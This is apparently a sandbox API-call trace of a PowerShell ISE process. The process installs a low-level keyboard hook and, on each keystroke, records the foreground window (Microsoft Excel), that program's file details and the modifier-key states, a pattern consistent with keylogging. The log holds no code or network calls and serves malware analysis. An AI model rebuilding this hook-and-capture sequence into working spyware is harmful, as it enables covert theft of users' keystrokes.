returned 0x0 [0189.601] CoGetContextToken (in: pToken=0x19eee8 | out: pToken=0x19eee8) returned 0x0 [0189.601] IUnknown:QueryInterface (in: This=0x5c8ab8, riid=0x19efb8*(Data1=0x10e, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19efb4 | out: ppvObject=0x19efb4*=0x5c8ab8) returned 0x0 [0189.601] IUnknown:AddRef (This=0x5c8ab8) returned 0x4 [0189.601] IUnknown:Release (This=0x5c8ab8) returned 0x3 [0189.601] IUnknown:Release (This=0x5c8ab8) returned 0x2 [0189.602] CoGetContextToken (in: pToken=0x19f008 | out: pToken=0x19f008) returned 0x0 [0189.602] CoGetContextToken (in: pToken=0x19ef68 | out: pToken=0x19ef68) returned 0x0 [0189.602] IUnknown:QueryInterface (in: This=0x5c8ab8, riid=0x19f038*(Data1=0x3cee8cc1, Data2=0x1adb, Data3=0x327f, Data4=([0]=0x9b, [1]=0x97, [2]=0x7a, [3]=0x9c, [4]=0x80, [5]=0x89, [6]=0xbf, [7]=0xb3)), ppvObject=0x19f034 | out: ppvObject=0x19f034*=0x0) returned 0x80004002 [0189.613] IDataObject:QueryGetData (This=0x5c8ab8, pFormatetc=0x19f17c) returned 0x0 [0189.617] IDataObject:RemoteGetData (in: This=0x5c8ab8, pformatetcIn=0x19f17c, pRemoteMedium=0x19f10c | out: pRemoteMedium=0x19f10c) returned 0x0 [0189.668] GlobalLock (hMem=0x58c0004) returned 0x57cd38 [0189.668] GlobalUnlock (hMem=0x58c0004) returned 0 [0189.755] SendMessageW (hWnd=0x0, Msg=0x308, wParam=0x0, lParam=0x0) returned 0x0 [0189.755] CallWindowProcW (lpPrevWndFunc=0x7725aee0, hWnd=0x4037e, Msg=0x308, wParam=0x0, lParam=0x0) returned 0x0 [0189.872] GetCurrentProcessId () returned 0x1188 [0189.872] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1188) returned 0x734 [0189.872] EnumProcessModules (in: hProcess=0x734, lphModule=0x235a560, cb=0x100, lpcbNeeded=0x19f440 | out: lphModule=0x235a560, lpcbNeeded=0x19f440) returned 1 [0189.874] EnumProcessModules (in: hProcess=0x734, lphModule=0x235a66c, cb=0x200, lpcbNeeded=0x19f440 | out: lphModule=0x235a66c, lpcbNeeded=0x19f440) returned 1 [0189.876] GetModuleInformation (in: hProcess=0x734, hModule=0x400000, lpmodinfo=0x235a8ac, cb=0xc | out: lpmodinfo=0x235a8ac*(lpBaseOfDll=0x400000, SizeOfImage=0x3a000, EntryPoint=0x0)) returned 1 [0189.876] CoTaskMemAlloc (cb=0x804) returned 0x521b200 [0189.876] GetModuleBaseNameW (in: hProcess=0x734, hModule=0x400000, lpBaseName=0x521b200, nSize=0x800 | out: lpBaseName="powershell_ise.exe") returned 0x12 [0189.876] CoTaskMemFree (pv=0x521b200) [0189.876] CoTaskMemAlloc (cb=0x804) returned 0x521b200 [0189.876] GetModuleFileNameExW (in: hProcess=0x734, hModule=0x400000, lpFilename=0x521b200, nSize=0x800 | out: lpFilename="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell_ise.exe")) returned 0x3d [0189.877] CoTaskMemFree (pv=0x521b200) [0189.877] CloseHandle (hObject=0x734) returned 1 [0189.907] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="powershell_ise.exe", cchWideChar=18, lpMultiByteStr=0x19f430, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powershell_ise.exe1\x05\x8cpÆ=(ú7ihö\x19", lpUsedDefaultChar=0x0) returned 18 [0189.907] GetModuleHandleA (lpModuleName="powershell_ise.exe") returned 0x400000 [0189.916] SetWindowsHookExW (idHook=13, lpfn=0x470069e, hmod=0x400000, dwThreadId=0x0) returned 0x220425 [0189.919] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc266 [0189.919] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc267 [0189.920] GetSystemMetrics (nIndex=75) returned 1 [0189.929] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x0 [0189.933] LoadLibraryW (lpLibFileName="comctl32.dll") returned 0x72d30000 [0189.946] GetStockObject (i=5) returned 0x1900015 [0189.947] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0189.947] CoTaskMemAlloc (cb=0x5c) returned 0x53df50 [0189.947] RegisterClassW (lpWndClass=0x19f220) returned 0xc268 [0189.948] CoTaskMemFree (pv=0x53df50) [0189.948] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0189.948] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.232467a_r10_ad1", lpWindowName=0x0, dwStyle=0x2010000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0xfffffffd, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x401e0 [0189.949] SetWindowLongW (hWnd=0x401e0, nIndex=-4, dwNewLong=1998958304) returned 74450630 [0189.949] GetWindowLongW (hWnd=0x401e0, nIndex=-4) returned 1998958304 [0189.949] SetWindowLongW (hWnd=0x401e0, nIndex=-4, dwNewLong=74450670) returned 1998958304 [0189.950] GetWindowLongW (hWnd=0x401e0, nIndex=-4) returned 74450670 [0189.950] GetWindowLongW (hWnd=0x401e0, nIndex=-16) returned 113311744 [0189.950] RegisterClipboardFormatW (lpszFormat="WinFormsMouseEnter") returned 0xc25f [0189.950] CallWindowProcW (lpPrevWndFunc=0x7725aee0, hWnd=0x401e0, Msg=0x24, wParam=0x0, lParam=0x19ed9c) returned 0x0 [0189.950] CallWindowProcW (lpPrevWndFunc=0x7725aee0, hWnd=0x401e0, Msg=0x81, wParam=0x0, lParam=0x19ed90) returned 0x1 [0189.951] CallWindowProcW (lpPrevWndFunc=0x7725aee0, hWnd=0x401e0, Msg=0x83, wParam=0x0, lParam=0x19ed7c) returned 0x0 [0189.952] CallWindowProcW (lpPrevWndFunc=0x7725aee0, hWnd=0x401e0, Msg=0x1, wParam=0x0, lParam=0x19ed90) returned 0x0 [0189.952] GetClientRect (in: hWnd=0x401e0, lpRect=0x19eabc | out: lpRect=0x19eabc) returned 1 [0189.952] GetWindowRect (in: hWnd=0x401e0, lpRect=0x19eabc | out: lpRect=0x19eabc) returned 1 [0189.954] GetParent (hWnd=0x401e0) returned 0x0 [0189.954] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x19f444 | out: lplpMessageFilter=0x19f444*=0x0) returned 0x0 [0189.956] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 1 [0189.956] IsWindowUnicode (hWnd=0x4037e) returned 1 [0189.957] GetMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f418) returned 1 [0189.958] TranslateMessage (lpMsg=0x19f418) returned 0 [0189.958] DispatchMessageW (lpMsg=0x19f418) returned 0x0 [0189.958] CallWindowProcW (lpPrevWndFunc=0x7725aee0, hWnd=0x4037e, Msg=0x31f, wParam=0x1, lParam=0x0) returned 0x0 [0189.958] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 1 [0189.958] IsWindowUnicode (hWnd=0x4037e) returned 1 [0189.958] GetMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f418) returned 1 [0189.959] TranslateMessage (lpMsg=0x19f418) returned 0 [0189.959] DispatchMessageW (lpMsg=0x19f418) returned 0x0 [0189.959] CallWindowProcW (lpPrevWndFunc=0x7725aee0, hWnd=0x4037e, Msg=0xc210, wParam=0x52, lParam=0x1) returned 0x0 [0189.959] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 1 [0189.959] IsWindowUnicode (hWnd=0x4037e) returned 1 [0189.959] GetMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f418) returned 1 [0189.959] TranslateMessage (lpMsg=0x19f418) returned 0 [0189.959] DispatchMessageW (lpMsg=0x19f418) returned 0x0 [0189.959] CallWindowProcW (lpPrevWndFunc=0x7725aee0, hWnd=0x4037e, Msg=0xc210, wParam=0x50, lParam=0x0) returned 0x0 [0189.959] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0189.961] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0189.961] WaitMessage () returned 1 [0195.700] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 1 [0195.700] IsWindowUnicode (hWnd=0x4037e) returned 1 [0195.700] GetMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f418) returned 1 [0195.701] TranslateMessage (lpMsg=0x19f418) returned 0 [0195.701] DispatchMessageW (lpMsg=0x19f418) returned 0x0 [0195.701] CallWindowProcW (lpPrevWndFunc=0x7725aee0, hWnd=0x4037e, Msg=0xc210, wParam=0x50, lParam=0x0) returned 0x0 [0195.701] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0195.701] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0195.701] WaitMessage () returned 1 [0195.705] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 1 [0195.706] IsWindowUnicode (hWnd=0x4037e) returned 1 [0195.706] GetMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19f418) returned 1 [0195.706] TranslateMessage (lpMsg=0x19f418) returned 0 [0195.706] DispatchMessageW (lpMsg=0x19f418) returned 0x0 [0195.706] CallWindowProcW (lpPrevWndFunc=0x7725aee0, hWnd=0x4037e, Msg=0xc210, wParam=0x50, lParam=0x0) returned 0x0 [0195.706] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0195.706] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0195.706] WaitMessage () returned 1 [0251.815] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0251.938] GetForegroundWindow () returned 0x6037c [0251.944] GetWindowThreadProcessId (in: hWnd=0x6037c, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0251.952] GetWindowTextLengthW (hWnd=0x6037c) returned 15 [0251.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x235e750, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0251.968] GetWindowTextA (in: hWnd=0x6037c, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0251.987] EnumProcesses (in: lpidProcess=0x235e828, cb=0x400, lpcbNeeded=0x19f030 | out: lpidProcess=0x235e828, lpcbNeeded=0x19f030) returned 1 [0252.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32594d0, Length=0x20000, ResultLength=0x19f000 | out: SystemInformation=0x32594d0, ResultLength=0x19f000*=0x145b0) returned 0x0 [0252.031] EnumProcesses (in: lpidProcess=0x237f660, cb=0x400, lpcbNeeded=0x19efec | out: lpidProcess=0x237f660, lpcbNeeded=0x19efec) returned 1 [0252.036] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x12e8) returned 0x3fc [0252.036] EnumProcessModules (in: hProcess=0x3fc, lphModule=0x237fcbc, cb=0x100, lpcbNeeded=0x19efc0 | out: lphModule=0x237fcbc, lpcbNeeded=0x19efc0) returned 1 [0252.053] EnumProcessModules (in: hProcess=0x3fc, lphModule=0x237fdc8, cb=0x200, lpcbNeeded=0x19efc0 | out: lphModule=0x237fdc8, lpcbNeeded=0x19efc0) returned 1 [0252.067] EnumProcessModules (in: hProcess=0x3fc, lphModule=0x237ffd4, cb=0x400, lpcbNeeded=0x19efc0 | out: lphModule=0x237ffd4, lpcbNeeded=0x19efc0) returned 1 [0252.083] GetModuleInformation (in: hProcess=0x3fc, hModule=0xf80000, lpmodinfo=0x2380414, cb=0xc | out: lpmodinfo=0x2380414*(lpBaseOfDll=0xf80000, SizeOfImage=0x19d8000, EntryPoint=0xf81000)) returned 1 [0252.083] CoTaskMemAlloc (cb=0x804) returned 0x5a5158 [0252.083] GetModuleBaseNameW (in: hProcess=0x3fc, hModule=0xf80000, lpBaseName=0x5a5158, nSize=0x800 | out: lpBaseName="EXCEL.EXE") returned 0x9 [0252.084] CoTaskMemFree (pv=0x5a5158) [0252.084] CoTaskMemAlloc (cb=0x804) returned 0x5a5158 [0252.084] GetModuleFileNameExW (in: hProcess=0x3fc, hModule=0xf80000, lpFilename=0x5a5158, nSize=0x800 | out: lpFilename="C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\excel.exe")) returned 0x3a [0252.085] CoTaskMemFree (pv=0x5a5158) [0252.085] CloseHandle (hObject=0x3fc) returned 1 [0252.085] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE", nBufferLength=0x105, lpBuffer=0x19eabc, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE", lpFilePart=0x0) returned 0x3a [0252.085] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x19ef64) returned 1 [0252.086] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE" (normalized: "c:\\program files (x86)\\microsoft office\\office16\\excel.exe"), fInfoLevelId=0x0, lpFileInformation=0x19efe0 | out: lpFileInformation=0x19efe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83146900, ftCreationTime.dwHighDateTime=0x1d0cb66, ftLastAccessTime.dwLowDateTime=0xac46085e, ftLastAccessTime.dwHighDateTime=0x1d8a64c, ftLastWriteTime.dwLowDateTime=0x83146900, ftLastWriteTime.dwHighDateTime=0x1d0cb66, nFileSizeHigh=0x0, nFileSizeLow=0x19cf4a0)) returned 1 [0252.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x19ef60) returned 1 [0252.091] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE", lpdwHandle=0x19f054 | out: lpdwHandle=0x19f054) returned 0x844 [0252.094] GetFileVersionInfoW (in: lptstrFilename="C:\\Program Files (x86)\\Microsoft Office\\Office16\\EXCEL.EXE", dwHandle=0x0, dwLen=0x844, lpData=0x2382668 | out: lpData=0x2382668) returned 1 [0252.096] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x19f028, puLen=0x19f024 | out: lplpBuffer=0x19f028*=0x2382a84, puLen=0x19f024) returned 1 [0252.098] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\\\StringFileInfo\\\\000004E4\\\\CompanyName", lplpBuffer=0x19efa8, puLen=0x19efa4 | out: lplpBuffer=0x19efa8*=0x2382720, puLen=0x19efa4) returned 1 [0252.098] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\\\StringFileInfo\\\\000004E4\\\\FileDescription", lplpBuffer=0x19efa8, puLen=0x19efa4 | out: lplpBuffer=0x19efa8*=0x2382774, puLen=0x19efa4) returned 1 [0252.098] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\\\StringFileInfo\\\\000004E4\\\\FileVersion", lplpBuffer=0x19efa8, puLen=0x19efa4 | out: lplpBuffer=0x19efa8*=0x23827b4, puLen=0x19efa4) returned 1 [0252.099] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\\\StringFileInfo\\\\000004E4\\\\InternalName", lplpBuffer=0x19efa8, puLen=0x19efa4 | out: lplpBuffer=0x19efa8*=0x23827f4, puLen=0x19efa4) returned 1 [0252.099] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\\\StringFileInfo\\\\000004E4\\\\LegalCopyright", lplpBuffer=0x19efa8, puLen=0x19efa4 | out: lplpBuffer=0x19efa8*=0x0, puLen=0x19efa4) returned 0 [0252.099] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\\\StringFileInfo\\\\000004E4\\\\OriginalFilename", lplpBuffer=0x19efa8, puLen=0x19efa4 | out: lplpBuffer=0x19efa8*=0x2382974, puLen=0x19efa4) returned 1 [0252.099] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\\\StringFileInfo\\\\000004E4\\\\ProductName", lplpBuffer=0x19efa8, puLen=0x19efa4 | out: lplpBuffer=0x19efa8*=0x23829a8, puLen=0x19efa4) returned 1 [0252.099] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\\\StringFileInfo\\\\000004E4\\\\ProductVersion", lplpBuffer=0x19efa8, puLen=0x19efa4 | out: lplpBuffer=0x19efa8*=0x23829f8, puLen=0x19efa4) returned 1 [0252.099] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\\\StringFileInfo\\\\000004E4\\\\Comments", lplpBuffer=0x19efa8, puLen=0x19efa4 | out: lplpBuffer=0x19efa8*=0x0, puLen=0x19efa4) returned 0 [0252.099] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\\\StringFileInfo\\\\000004E4\\\\LegalTrademarks", lplpBuffer=0x19efa8, puLen=0x19efa4 | out: lplpBuffer=0x19efa8*=0x0, puLen=0x19efa4) returned 0 [0252.099] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\\\StringFileInfo\\\\000004E4\\\\PrivateBuild", lplpBuffer=0x19efa8, puLen=0x19efa4 | out: lplpBuffer=0x19efa8*=0x0, puLen=0x19efa4) returned 0 [0252.099] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\\\StringFileInfo\\\\000004E4\\\\SpecialBuild", lplpBuffer=0x19efa8, puLen=0x19efa4 | out: lplpBuffer=0x19efa8*=0x0, puLen=0x19efa4) returned 0 [0252.099] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x19ef9c, puLen=0x19ef98 | out: lplpBuffer=0x19ef9c*=0x2382a84, puLen=0x19ef98) returned 1 [0252.099] VerLanguageNameW (in: wLang=0x0, szLang=0x19ed2c, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0252.108] VerQueryValueW (in: pBlock=0x2382668, lpSubBlock="\\", lplpBuffer=0x19efac, puLen=0x19efa8 | out: lplpBuffer=0x19efac*=0x2382690, puLen=0x19efa8) returned 1 [0252.131] GetKeyState (nVirtKey=16) returned 0 [0252.131] GetKeyState (nVirtKey=17) returned 0 [0252.131] GetKeyState (nVirtKey=18) returned 0 [0252.131] GetKeyState (nVirtKey=16) returned 0 [0252.131] GetKeyState (nVirtKey=17) returned 0 [0252.131] GetKeyState (nVirtKey=18) returned 0 [0252.140] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0252.140] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0252.499] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0252.499] WaitMessage () returned 1 [0256.648] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0256.650] GetForegroundWindow () returned 0x80284 [0256.650] GetWindowThreadProcessId (in: hWnd=0x80284, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0256.650] GetWindowTextLengthW (hWnd=0x80284) returned 15 [0256.650] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x2384620, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0256.650] GetWindowTextA (in: hWnd=0x80284, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0256.651] GetKeyState (nVirtKey=16) returned 0 [0256.651] GetKeyState (nVirtKey=17) returned 0 [0256.651] GetKeyState (nVirtKey=18) returned 0 [0256.651] GetKeyState (nVirtKey=16) returned 0 [0256.651] GetKeyState (nVirtKey=17) returned 0 [0256.651] GetKeyState (nVirtKey=18) returned 0 [0256.651] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0256.660] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0256.660] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0256.745] WaitMessage () returned 1 [0260.540] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0260.541] GetForegroundWindow () returned 0x4045a [0260.542] GetWindowThreadProcessId (in: hWnd=0x4045a, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0260.542] GetWindowTextLengthW (hWnd=0x4045a) returned 15 [0260.542] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x2384ba4, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0260.542] GetWindowTextA (in: hWnd=0x4045a, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0260.542] GetKeyState (nVirtKey=16) returned 0 [0260.543] GetKeyState (nVirtKey=17) returned 0 [0260.543] GetKeyState (nVirtKey=18) returned 0 [0260.543] GetKeyState (nVirtKey=16) returned 0 [0260.543] GetKeyState (nVirtKey=17) returned 0 [0260.543] GetKeyState (nVirtKey=18) returned 0 [0260.543] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0260.549] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0260.549] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0260.550] WaitMessage () returned 1 [0263.681] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0263.682] GetForegroundWindow () returned 0x6045a [0263.682] GetWindowThreadProcessId (in: hWnd=0x6045a, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0263.682] GetWindowTextLengthW (hWnd=0x6045a) returned 15 [0263.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x23851c8, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0263.682] GetWindowTextA (in: hWnd=0x6045a, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0263.683] GetKeyState (nVirtKey=16) returned 0 [0263.683] GetKeyState (nVirtKey=17) returned 0 [0263.683] GetKeyState (nVirtKey=18) returned 0 [0263.683] GetKeyState (nVirtKey=16) returned 0 [0263.683] GetKeyState (nVirtKey=17) returned 0 [0263.683] GetKeyState (nVirtKey=18) returned 0 [0263.683] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0263.689] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0263.689] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0263.690] WaitMessage () returned 1 [0266.693] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0266.694] GetForegroundWindow () returned 0x8045a [0266.694] GetWindowThreadProcessId (in: hWnd=0x8045a, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0266.695] GetWindowTextLengthW (hWnd=0x8045a) returned 15 [0266.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x238588c, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0266.695] GetWindowTextA (in: hWnd=0x8045a, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0266.695] GetKeyState (nVirtKey=16) returned 0 [0266.696] GetKeyState (nVirtKey=17) returned 0 [0266.696] GetKeyState (nVirtKey=18) returned 0 [0266.696] GetKeyState (nVirtKey=16) returned 0 [0266.696] GetKeyState (nVirtKey=17) returned 0 [0266.696] GetKeyState (nVirtKey=18) returned 0 [0266.696] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0266.699] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0266.699] WaitMessage () returned 1 [0266.701] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0266.708] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, lParam=0x19f304) returned 0x0 [0266.709] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0266.709] WaitMessage () returned 1 [0270.784] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0270.785] GetForegroundWindow () returned 0x703ac [0270.785] GetWindowThreadProcessId (in: hWnd=0x703ac, lpdwProcessId=0x4a4740 | out: lpdwProcessId=0x4a4740) returned 0x12ec [0270.786] GetWindowTextLengthW (hWnd=0x703ac) returned 15 [0270.786] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x2386088, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0270.786] GetWindowTextA (in: hWnd=0x703ac, lpString=0x19f00c, nMaxCount=16 | out: lpString="Microsoft Excel") returned 15 [0270.787] GetKeyState (nVirtKey=16) returned 0 [0270.787] GetKeyState (nVirtKey=17) returned 0 [0270.787] GetKeyState (nVirtKey=18) returned 0 [0270.787] GetKeyState (nVirtKey=16) returned 0 [0270.787] GetKeyState (nVirtKey=17) returned 0 [0270.787] GetKeyState (nVirtKey=18) returned 0 [0270.787] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x100, lParam=0x19f304) returned 0x0 [0270.796] PeekMessageW (in: lpMsg=0x19f418, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x19f418) returned 0 [0270.796] CallNextHookEx (hhk=0x0, nCode=0, wParam=0x101, 